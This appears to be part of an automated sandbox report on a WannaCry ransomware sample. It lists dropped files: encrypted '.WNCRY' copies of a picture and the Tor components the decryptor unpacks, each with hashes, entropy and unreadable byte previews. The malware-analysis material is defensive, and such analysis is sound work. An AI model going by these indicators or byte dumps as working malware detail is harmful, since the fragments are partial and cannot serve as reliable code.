                                SSDEEP:24:bkmH6jTHspl6ds+CSWK+xIF9BoJel8HvMQhl3ezPQL8ItgcaMf0V0Io8rrOIHvDj:bkG6Xa4dsyWZI/Bd8PWPQ7XfBv8r/bnj
                                MD5:4C9A9916D29AD69E2CDE3B539C47A238
                                SHA1:7D1E07081673BB3BA0BBC9E36FC8085E4FE5D2CA
                                SHA-256:8B0C4FE2AD5A1FBDCD1905B43ADC2EBCBFC09AA5691E56FDDF4F50C5BD37C1BE
                                SHA-512:06F0D1690EED4BC5745862416124AAF95FDFEA1326662BC6BCFFC55743FE1FFA7FB55E7CCBD1813577E2645F84B0E470C43945263091B69B5B39A640719A9BE1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....q.z;......W.d|&..&../.nc..K-9..\...f.$.G...P.O.A.}.6&@.v=.vs.$]....2.UC.fm.>.5..L..#......h.....'.....j.).RAI.o..0..V`.......-...,............;T.. ...s.m-V4.._&.['..$.A.#'...E(3..........c.)_w.g...Y........5G.}.q....5b.\M.i.. ........lP.D..............D.SK..^.&.o#M.yh;#Y1......r.e..k...._..C#..G.6,.>6.BrU.._J.........+.%C.L.$>\.<.+...>r.....6......d#....4.Ku...Jg.x...^.<.b..z3..L..E....q.mr....L..W..zF.8z.l!J.a_.g..EP.....{...;...Bq.h...hN..$.[.... k<.T.}B.;^%.0F..w. G..I.|&.hOo...$..D..o.c......m.rbTm..0...?.~......<...?T.X..l.kQ..A..yD[@..(D....!.....+...@._.b..se.......o.o9;A....1...(.....P.o.J.e.._..\.......... (H.7)....~l...V...f.E..3E....s.}..2.{...^....@..~P..5....D..-.b!......lo.d._M..a..I...lfn..z..A.O".I...M.....-}k.e}...in...6..u?...B......[.~/n.f......q+...."..#P.n...P...4)_.q....bl...L.7}e.Ac"..,.5v.eJ.K4Z|i....!.9l......>....Yu........JGO./....C..x.N.0..V......7...!..}eX..M.P7....G...n...3.I..H.m..v!..

                                C:\Users\user\Desktop\SQSJKEBWDT\ZGGKNSUKOP.jpg

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.821676905593745
                                Encrypted:false
                                SSDEEP:24:P1E61rOM3jdTcANgcTR6i7d8zFOPTHy+3dNxFTr:dE6BOMdcGgcYi7dwFMTdRn
                                MD5:89808A2EBC2DB47BCF9D65A6E7298CE8
                                SHA1:107B582817281A2CA6EA3A36FDDE1F8A30F297D8
                                SHA-256:B8B1D173EF1D739CF9A385A193458F75C4B9237E17B78CA5D2E0693BDB630786
                                SHA-512:0F7CA80A46236FD61786790879B5CF8BB1EB6071F0A4E69D911ACC86640B63181CC53ED3255B4B9C665F97687C3A4B740D9EB17A1B167A65B4708768428AEF55
                                Malicious:false
                                Reputation:unknown
                                Preview:..so.o...-r.@.s...C.G..@?.L....CG^..w):a8.. a....+.}|..+n..I.>t..t.....S.G.8.e.'1.|..9....k...(z.t.+T.%F....}a..\'..F>.I.%..*;....@.u...n0.....C.v"..|...\..,K;.oA........f......$......Y....Qu....H.q...k5D.4.4........?..r....o.....uE.+q..x...s....0.!K.l)V}q.@.."....*.b.4..e........Z3G..HY`..B.......P.xT.q..xE,K...../..6........G.1}...=.....[.8.UE)r.9....'.....0L.{L.....s......./c......]..9.2...{l..&.F.!.. `.......LP}...Vr..8....h.m.:..xl...M...VZ..JLd =.i.#t...8t......|w.8...Kb.XEc.`'pl....n......[..?;.e...H..../......!.)..vr)....h..V..."...L_r...?A..8.........j....].Q..........."t.e.;yY..w...f.............x.P.....r.y.'.r~I6..5...R..&...U.|@.+......1.......u...b{.)..g..r.?6$.b5.V.$.0^..........~..k,.e;h!..u-...>.C*K.l.C.....N.5b...|.4.[.r..R.i..N...2.71.....1B..D.#'....y.6...i.../d..k...A||...\..P.. ...W/..........=>S..:.r..9D.~...........!... N+&..kt..G..".]..t.vG......'...6....^.)|..z..1x1.....l.....u..Q.*.C.`.m.r.(.*......0M.R

                                C:\Users\user\Desktop\SQSJKEBWDT\ZGGKNSUKOP.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.853037328722231
                                Encrypted:false
                                SSDEEP:24:bkqbCNriHu9rj6f4o7hsM72OGxAwaWG3dqw70c1Zr7ZgGNaRpqYEMiOh1aFWLLMT:bk9NrFH6Qo7GM7nzp3dLZvBaRpjvjuWe
                                MD5:BE7C3D7947E4599A473C7DEB9E94302C
                                SHA1:48A7195C5C7D186847D6D10FF8EE2E9C9F1B9C8E
                                SHA-256:4F9BD7F0BE8EE39DC52A93BD5E6316FE1AF41D0D6913E6DBF7CE7759F5AF9DC2
                                SHA-512:9BE9F9DE2375D3A127BE51A70DAA61A00D637D2E690B39629F12E07243790E60386D4998F459931A04F0E7DFFE7F4F5FDDE025580D6429C412ABB315397709A0
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......^J..d....6..-..#.2......@.....z.....d...q..H..~....H.R..`.&.WK.=....$.PU.S.(!.........?z...B{.:*;.jf..U1.Z..&..=...OOM..KV)a..*..v."O~.....S...R..0~t.[W...O.\.iAz.iD...D...UW....<r.{....E.B&uk.u.*.:+.+.<.jxW..&.`!.......;.\...-m...2.k....gL.............fs^(0,J.kJ.E.I..M.}...,-.g..F.W.k.GT.eW.7.r.^.m..W.a..Vl..X..C.|...U>t"..H..8..".8..ND.....h.......-|..6,..Z.....H..B....4..X...#..f.&.2A......m.&.]..~...f.&.......X.&..16......`...MR%/.am.e._T...k.......f...p....."...>c..T....y../"..`...ZS....W4.M....ds..;\e6.3.......x..A..>...:!G.....$....P.>..^.....3....p.5.v.... w...L..,8Q.V.X...p.q.r..^.......`.t.}..O....@4f6h._.z.{v.8.....m.,mu.%..A...o....:.F....\....-.<&};.._.t:.S..!...:1.h.r..........k@.....Zs!I.pB..Jx.e.-.0.H...bN..Umv:.......G....HZ6$J...D_..K..z.."hs.....ZB..)i.......j.yL.8......[o.....#..Y.9.v".......x.......$.II......E...].7........#Z.....y....P..Gu.h5....k..pK+E'fh7)C.......<...e.U.).-q..T...lW.R...*...4..

                                C:\Users\user\Desktop\SQSJKEBWDT\ZGGKNSUKOP.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.853037328722231
                                Encrypted:false
                                SSDEEP:24:bkqbCNriHu9rj6f4o7hsM72OGxAwaWG3dqw70c1Zr7ZgGNaRpqYEMiOh1aFWLLMT:bk9NrFH6Qo7GM7nzp3dLZvBaRpjvjuWe
                                MD5:BE7C3D7947E4599A473C7DEB9E94302C
                                SHA1:48A7195C5C7D186847D6D10FF8EE2E9C9F1B9C8E
                                SHA-256:4F9BD7F0BE8EE39DC52A93BD5E6316FE1AF41D0D6913E6DBF7CE7759F5AF9DC2
                                SHA-512:9BE9F9DE2375D3A127BE51A70DAA61A00D637D2E690B39629F12E07243790E60386D4998F459931A04F0E7DFFE7F4F5FDDE025580D6429C412ABB315397709A0
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......^J..d....6..-..#.2......@.....z.....d...q..H..~....H.R..`.&.WK.=....$.PU.S.(!.........?z...B{.:*;.jf..U1.Z..&..=...OOM..KV)a..*..v."O~.....S...R..0~t.[W...O.\.iAz.iD...D...UW....<r.{....E.B&uk.u.*.:+.+.<.jxW..&.`!.......;.\...-m...2.k....gL.............fs^(0,J.kJ.E.I..M.}...,-.g..F.W.k.GT.eW.7.r.^.m..W.a..Vl..X..C.|...U>t"..H..8..".8..ND.....h.......-|..6,..Z.....H..B....4..X...#..f.&.2A......m.&.]..~...f.&.......X.&..16......`...MR%/.am.e._T...k.......f...p....."...>c..T....y../"..`...ZS....W4.M....ds..;\e6.3.......x..A..>...:!G.....$....P.>..^.....3....p.5.v.... w...L..,8Q.V.X...p.q.r..^.......`.t.}..O....@4f6h._.z.{v.8.....m.,mu.%..A...o....:.F....\....-.<&};.._.t:.S..!...:1.h.r..........k@.....Zs!I.pB..Jx.e.-.0.H...bN..Umv:.......G....HZ6$J...D_..K..z.."hs.....ZB..)i.......j.yL.8......[o.....#..Y.9.v".......x.......$.II......E...].7........#Z.....y....P..Gu.h5....k..pK+E'fh7)C.......<...e.U.).-q..T...lW.R...*...4..

                                C:\Users\user\Desktop\TaskData\Tor\libeay32.dll

                                Download File
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):3197106
                                Entropy (8bit):6.130063064844696
                                Encrypted:false
                                SSDEEP:98304:W5FYc9YouOquJVqrR1LlZRUT83DlJrqd+kq:WrjYouOquJgrlZ283xFqdq
                                MD5:6ED47014C3BB259874D673FB3EAEDC85
                                SHA1:C9B29BA7E8A97729C46143CC59332D7A7E9C1AD8
                                SHA-256:58BE53D5012B3F45C1CA6F4897BECE4773EFBE1CCBF0BE460061C183EE14CA19
                                SHA-512:3BC462D21BC762F6EEC3D23BB57E2BAF532807AB8B46FAB1FE38A841E5FDE81ED446E5305A78AD0D513D85419E6EC8C4B54985DA1D6B198ACB793230AEECD93E
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......... ........!.....J... ..0...........`.....c..........................!.......0...@... .........................A....`..\.......<.......................h...................................................4c...............................text....H.......J..................`.p`.data...\d...`...f...P..............@.`..rdata..............................@.`@.bss.........p........................`..edata..A............V..............@.0@.idata..\....`......................@.0..CRT....,...........................@.0..tls.... ............ ..............@.0..rsrc...<............"..............@.0..reloc..h............(..............@.0B/4............ ......& .............@.@B/19.....;z.... ..|...( .............@..B/31.....`....@!....... .............@..B/45.....'....`!....... .............@..B/57...........!....... .............@.0B/70.....".....!....... .

                                C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll

                                Download File
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):719217
                                Entropy (8bit):5.981438230537172
                                Encrypted:false
                                SSDEEP:6144:Ir2r5rFriGKbgai112Yq/5hcQTcGzAHzSHeqoftOEEdD4B2pihSpKOKm:naiV25uQTcGzAHOEW+Pzm
                                MD5:90F50A285EFA5DD9C7FDDCE786BDEF25
                                SHA1:54213DA21542E11D656BB65DB724105AFE8BE688
                                SHA-256:77A250E81FDAF9A075B1244A9434C30BF449012C9B647B265FA81A7B0DB2513F
                                SHA-512:746422BE51031CFA44DD9A6F3569306C34BBE8ABF9D2BD1DF139D9C938D0CBA095C0E05222FD08C8B6DEAEBEF5D3F87569B08FB3261A2D123D983517FB9F43AE
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........t.........!.....@...................P.....e......................... ............@... ......................P..4H......................................t+.....................................................4............................text...T?.......@..................`.P`.data........P.......F..............@.`..rdata.. ....`.......J..............@.`@.bss.........0........................`..edata..4H...P...J..................@.0@.idata...............X..............@.0..CRT....,............h..............@.0..tls.... ............j..............@.0..reloc..t+.......,...l..............@.0B/4..................................@.@B/19.................................@..B/31......(.......*...|..............@..B/45.....1*... ...,..................@..B/57..........P......................@.0B/70.....v....p......................@..B/81....................

                                C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll

                                Download File
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):417759
                                Entropy (8bit):5.853358941151938
                                Encrypted:false
                                SSDEEP:6144:g8r2rQrFr0XGXnZ7rvzRsiWqnjmYl5oHIH9A:gtXGJnvmiggA
                                MD5:E5DF3824F2FCAD0C75FD601FCF37EE70
                                SHA1:902418A4C5F3684DBA5E3246DE8C4E21C92D674E
                                SHA-256:5CD126B4F8C77BDF0C5C980761A9C84411586951122131F13B0640DB83F792D8
                                SHA-512:7E70889B46B54175C6BADA7F042F5730CA7E3D156F7B6711FDF453911E4F78D64A2A8769EB8F0E33E826A3B30E623B3CD4DAF899D9D74888BB3051F08CF34461
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........k......!.....`...4...............p.....b......................................@... ..............................@...............................p...............................`......................pB...............................text...._.......`..................`.P`.data........p.......f..............@.`..rdata..xr.......t...j..............@.`@.bss..................................`..edata...........0..................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..reloc.......p....... ..............@.0B/4......P............:..............@.@B/19.................>..............@..B/31..........0......................@..B/45..........P......................@..B/57.....<....p......................@.0B/70....."...........................@..B/81.....B...............

                                C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll

                                Download File
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):411369
                                Entropy (8bit):5.909395689751269
                                Encrypted:false
                                SSDEEP:3072:oLQzG3CaDYuKCsZW9p2M8suCOSNKOM0LE5BtBsxvQkVgA2+FOYtLEgZEVPSm0aQY:oWHMACLoYaQ2bj+b0pJ
                                MD5:6D6602388AB232CA9E8633462E683739
                                SHA1:41072CC983568D8FEEB3E18C4B74440E9D44019A
                                SHA-256:957D58061A42CA343064EC5FB0397950F52AEDF0594A18867D1339D5FBB12E7E
                                SHA-512:B37BF121EA20FFC16AF040F8797C47FA8588834BC8A8115B45DB23EE5BFBEBCD1E226E9ACAB67B5EE43629A255FEA2CEEE4B3215332DD4127F187EE10244F1C3
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........b.........!...............................l......................... ............@... .................................................................h...................................................L................................text...............................`.P`.data...............................@.`..rdata..DR... ...T..................@.`@.bss..................................`..edata...............T..............@.0@.idata...............p..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..h...........................@.0B/4......8...........................@.@B/19.....W.... ......................@..B/31......%.......&...v..............@..B/45......&...0...(..................@..B/57..........`......................@.0B/70.....v....p......................@..B/81.....................

                                C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll

                                Download File
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):523262
                                Entropy (8bit):5.7796587531390795
                                Encrypted:false
                                SSDEEP:6144:+ymz8Jq1p95avGpuO+/jUE8ADu2kNBMY8KHNygoB0+6tMqSsVwvN:+ylSZ+/jU7ynIK5Bb6Y
                                MD5:73D4823075762EE2837950726BAA2AF9
                                SHA1:EBCE3532ED94AD1DF43696632AB8CF8DA8B9E221
                                SHA-256:9AECCF88253D4557A90793E22414868053CAAAB325842C0D7ACB0365E88CD53B
                                SHA-512:8F4A65BD35ED69F331769AAF7505F76DD3C64F3FA05CF01D83431EC93A7B1331F3C818AC7008E65B6F1278D7E365ED5940C8C6B8502E77595E112F1FACA558B5
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.....B...p...............`.....l.........................p......5(....@... .................................l....................................................................................................................text...X@.......B..................`.P`.data...8....`.......H..............@.0..rdata..<....p.......J..............@.`@.bss..................................`..edata...............Z..............@.0@.idata..l............f..............@.0..CRT....,............l..............@.0..tls.... ............n..............@.0..reloc...............p..............@.0B/4...................v..............@.@B/19.....Du.......v..................@..B/31....._o...p...p..................@..B/45..................l..............@..B/57.....|-...p......................@.0B/70.....J...........................@..B/81.................(..

                                C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll

                                Download File
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):92599
                                Entropy (8bit):5.351249974009154
                                Encrypted:false
                                SSDEEP:1536:pEiL38qIuOFcErNX5d0tRCZiBP2DrbjgpfM2ydbv:aiLsqIHFPpdiU2q
                                MD5:78581E243E2B41B17452DA8D0B5B2A48
                                SHA1:EAEFB59C31CF07E60A98AF48C5348759586A61BB
                                SHA-256:F28CAEBE9BC6AA5A72635ACB4F0E24500494E306D8E8B2279E7930981281683F
                                SHA-512:332098113CE3F75CB20DC6E09F0D7BA03F13F5E26512D9F3BEE3042C51FBB01A5E4426C5E9A5308F7F805B084EFC94C28FC9426CE73AB8DFEE16AB39B3EFE02A
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.........4...............0.....h................................<.....@... ......................`..i....p..................................@....................................................q...............................text...............................`.P`.data........0......."..............@.0..rdata..h....@.......$..............@.0@.bss.........P........................`..edata..i....`.......*..............@.0@.idata.......p.......,..............@.0..CRT....,............2..............@.0..tls.... ............4..............@.0..reloc..@............6..............@.0B/4...................:..............@.@B/19.....n|.......~...<..............@..B/31..........@......................@..B/45..........`......................@..B/57.....$...........................@.0B/70....."...........................@..B/81.....w...............

                                C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll

                                Download File
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):711459
                                Entropy (8bit):5.884120014912355
                                Encrypted:false
                                SSDEEP:12288:hXhKnXI0Fkw80VEJtzwIA6Ouah6ESyrWlp36Z:thKnnkw80VEJtzwIAiazSxlFw
                                MD5:A12C2040F6FDDD34E7ACB42F18DD6BDC
                                SHA1:D7DB49F1A9870A4F52E1F31812938FDEA89E9444
                                SHA-256:BD70BA598316980833F78B05F7EEAEF3E0F811A7C64196BF80901D155CB647C1
                                SHA-512:FBE0970BCDFAA23AF624DAAD9917A030D8F0B10D38D3E9C7808A9FBC02912EE9DAED293DBDEA87AA90DC74470BC9B89CB6F2FE002393ECDA7B565307FFB7EC00
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........p..y .....!..............................@n......................... .......4....@... ......................0..m)...`...4......<.......................85..................................................,g...............................text...............................`.P`.data....-..........................@.`..rdata.......@.......0..............@.`@.bss....d.... ........................`..edata..m)...0...*..................@.0@.idata...4...`...6...6..............@.0..CRT....,............l..............@.0..tls.... ............n..............@.0..rsrc...<............p..............@.0..reloc..85.......6...v..............@.0B/4..................................@.@B/19.....n|... ...~..................@..B/31..................,..............@..B/45..................B..............@..B/57.....$............T..............@.0B/70....."............\..

                                C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe

                                Download File
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                Category:dropped
                                Size (bytes):3098624
                                Entropy (8bit):6.512654975680739
                                Encrypted:false
                                SSDEEP:49152:5m9/gUvHrLaQ4Dt4PC+3xhae2cQX7E5zNvQIJZW/1h4+o4:MiuLSDt2C+3baAQX7ETQIr+h4+o
                                MD5:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                SHA1:53912D33BEC3375153B7E4E68B78D66DAB62671A
                                SHA-256:E48673680746FBE027E8982F62A83C298D6FB46AD9243DE8E79B7E5A24DCD4EB
                                SHA-512:8AC6DC5BB016AFC869FCBB713F6A14D3692E866B94F4F1EE83B09A7506A8CB58768BD47E081CF6E97B2DACF9F9A6A8CA240D7D20D0B67DBD33238CC861DEAE8F
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Cm8..................#..D/..H............#...@.........................../......./...@... .............................. ...2..............................D]...........................p.......................'...............................text...t.#.......#.................`.P`.data.........#.......#.............@.`..rdata........$.......$.............@.`@.bss....`G....-.......................`..idata...2... ...4....-.............@.0..CRT....4....`........-.............@.0..tls.... ....p........-.............@.0..reloc..D].......^....-.............@.0B................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\Desktop\TaskData\Tor\tor.exe

                                Download File
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                Category:dropped
                                Size (bytes):3098624
                                Entropy (8bit):6.512654975680739
                                Encrypted:false
                                SSDEEP:49152:5m9/gUvHrLaQ4Dt4PC+3xhae2cQX7E5zNvQIJZW/1h4+o4:MiuLSDt2C+3baAQX7ETQIr+h4+o
                                MD5:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                SHA1:53912D33BEC3375153B7E4E68B78D66DAB62671A
                                SHA-256:E48673680746FBE027E8982F62A83C298D6FB46AD9243DE8E79B7E5A24DCD4EB
                                SHA-512:8AC6DC5BB016AFC869FCBB713F6A14D3692E866B94F4F1EE83B09A7506A8CB58768BD47E081CF6E97B2DACF9F9A6A8CA240D7D20D0B67DBD33238CC861DEAE8F
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Cm8..................#..D/..H............#...@.........................../......./...@... .............................. ...2..............................D]...........................p.......................'...............................text...t.#.......#.................`.P`.data.........#.......#.............@.`..rdata........$.......$.............@.`@.bss....`G....-.......................`..idata...2... ...4....-.............@.0..CRT....4....`........-.............@.0..tls.... ....p........-.............@.0..reloc..D].......^....-.............@.0B................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\Desktop\TaskData\Tor\zlib1.dll

                                Download File
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                Category:dropped
                                Size (bytes):107520
                                Entropy (8bit):6.440165833134522
                                Encrypted:false
                                SSDEEP:1536:NlN3sTKU7xniaO9ADje81EQ3aL8WNdUCqfRnToIfBoIONIOqbW+xCvETe:DpsmU7xaiDjeJL5qf5TBfgHqbdxCv6e
                                MD5:FB072E9F69AFDB57179F59B512F828A4
                                SHA1:FE71B70173E46EE4E3796DB9139F77DC32D2F846
                                SHA-256:66D653397CBB2DBB397EB8421218E2C126B359A3B0DECC0F31E297DF099E1383
                                SHA-512:9D157FECE0DC18AFE30097D9C4178AE147CC9D465A6F1D35778E1BFF1EFCA4734DD096E95D35FAEA32DA8D8B4560382338BA9C6C40F29047F1CC0954B27C64F8
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....&...................@.....b......................... ...........@... .....................................................................................................................$................................text...d$.......&..................`.P`.data...X....@.......*..............@.0..rdata..pW...P...X...,..............@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                C:\Users\user\Desktop\ZGGKNSUKOP.jpg

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.807981005733831
                                Encrypted:false
                                SSDEEP:24:Mcx5jh68dTprtSkqZOL0BbPa9omSj9uzoDkDT:DTTpxShOLOrmSBuzo4P
                                MD5:77205474DC1784F928EE5888A1F646BD
                                SHA1:E68203E0D04FF8087DA3C50FE58CD85DC6400843
                                SHA-256:C40580AF0358D5A521898B82B70030E53A1FC72F1756ADE1FBBFBA7B6D62CAE4
                                SHA-512:6FC11775F7F4F72D42D60A68D98B61B8F4AF581509421BF7954BFD7F67ADA99E132DFF490F97DEEFB61D044243E8AA38295391857FFF22FDF291DCBE7CF1CF28
                                Malicious:false
                                Reputation:unknown
                                Preview:.p..6.9....N.`...5a*.oo.._.$.2.I.z!.;...W.[...e.^..X...Ma............vgZ...\.....'0..].b....'.#f;..ux..:bk..D..o26.H. .=\.....kh|B.;...9.k-DG..A........2dV.z.E.(/.%..5...!...7iI,.[~]...\.mP.`;..,d..s.y0.L.......GEC......2......:G[....B.*...6f....H{g........X...h...J...+.1.hH.Kg...W....5..x..:.\.RJqZ.....?.. .5.......1.....Z,X4..7DL+4.....<.thhwf....u.n.e..w.*.9....9.)...P#..T..#).}Rgy."...kMH.......;t..X.b..\.e(i.G0.......(.r?....&.xq.V.S.t|1....v[...5.......4.}..%2t\..?.(.[..Fz.|.f.."O....p_.md....9~...V.r.../!.Y..8r.z9^..Rg.......#..Q.V......b.e.)nM.d.g.M...T..=......a...\...H.H......u ...}........<_..kU...v..5L.N....b.._~........z.epu..L..U....X.;.M.c..>.#8..{@............g.....IV.............5.I.../..mY..U_\.@...@.<C..jW..]..h.a...yz.........)...f.0D.....M.a......U....r...6.'<...)..}....P.&.A.l.{.?..&B.. .d..s.W......0[u.1....3.>.........|^_Y.....$U.......6...`..P]......Z2!07....M......e....c~.._. ....@{i".S.

                                C:\Users\user\Desktop\ZGGKNSUKOP.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.845056168591268
                                Encrypted:false
                                SSDEEP:24:bkfowZ81WGjUIrn9b9OBJsj2frhPjCD5gHAKSjpYEn:bkfp+WGjzrn90BC2zo6Gl
                                MD5:D599D9F24C782D7E27E6C8D7377D103E
                                SHA1:CF651104591B9EA7326B5C41DE98CD6C11852860
                                SHA-256:8788C4F33DB9B2BEB5725AE86395B795E03A8ECB4AA450C729351F3FE986C4AD
                                SHA-512:7AFC606D42CDC01A5FBBA042618B7CF12D49BD1B3DE5CB539973D098C12B7A4B314F5FA4128C4610C97F6CE4B1A7D9A34F24C288EE0C23F78A33EF3A8E565D25
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....E....A.....1..}1..a.Q.pE....L......O...y...{].....Z..$.D.>....?.B. we.L.d.R.........A .%.{..]..i.w...NJ..|'......&](E.^..?y<QuZy...'.8..b..Da.>.....N.H4AF` h.AA._me.|.......`.;.$..R.W|..9..f%......Ggm.....ZR9.=..2......*.x...@y..2...&k..8_;.K.0...............v.......&..F...O.%q.....t)>.\.(..|u>.,.p...0..Y./.I.?.b...tY.O^b.vC..2.8.MOU.4.u..E..1...,..s].LI......+.y....WB.UK.P^l.G..j.9......H.\..?...X....H....vzK58.=&.qJz..!..].{...L._M...9...E..Hn....Y...y..Fz\5G..Z;..2.........?...........}..:._.Jm...{.7.D(m..p..4.0N....?...G..y..........a;.........}H@.[..r.3.v.hr.w..d.h.A8M...j.+*...k....E..^._.x...i.a.k9.%..?37.v8.F.e..1....K.N..8.....X.3...v_.R.)~.>...w!rD:.N.4....`.....jY...+.s...M..0X.z..d..s%.....CH|".d..JTa.X...)...d.i.d.6......T.s.2f.*..=X.........,=.e;....?.?.I...&UM...........-..Z.....`..D[[.+i..EU...~.:b.^.#.[.....p...S.-V..m.h..K.........`...H.eL.q..g_.......8.}K.:{.w.|3.p.=..[Z8l..p...HI..b\..0;.J.Q.V.~....N..0q...j.p..

                                C:\Users\user\Desktop\ZGGKNSUKOP.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.845056168591268
                                Encrypted:false
                                SSDEEP:24:bkfowZ81WGjUIrn9b9OBJsj2frhPjCD5gHAKSjpYEn:bkfp+WGjzrn90BC2zo6Gl
                                MD5:D599D9F24C782D7E27E6C8D7377D103E
                                SHA1:CF651104591B9EA7326B5C41DE98CD6C11852860
                                SHA-256:8788C4F33DB9B2BEB5725AE86395B795E03A8ECB4AA450C729351F3FE986C4AD
                                SHA-512:7AFC606D42CDC01A5FBBA042618B7CF12D49BD1B3DE5CB539973D098C12B7A4B314F5FA4128C4610C97F6CE4B1A7D9A34F24C288EE0C23F78A33EF3A8E565D25
                                Malicious:false
                                Reputation:unknown
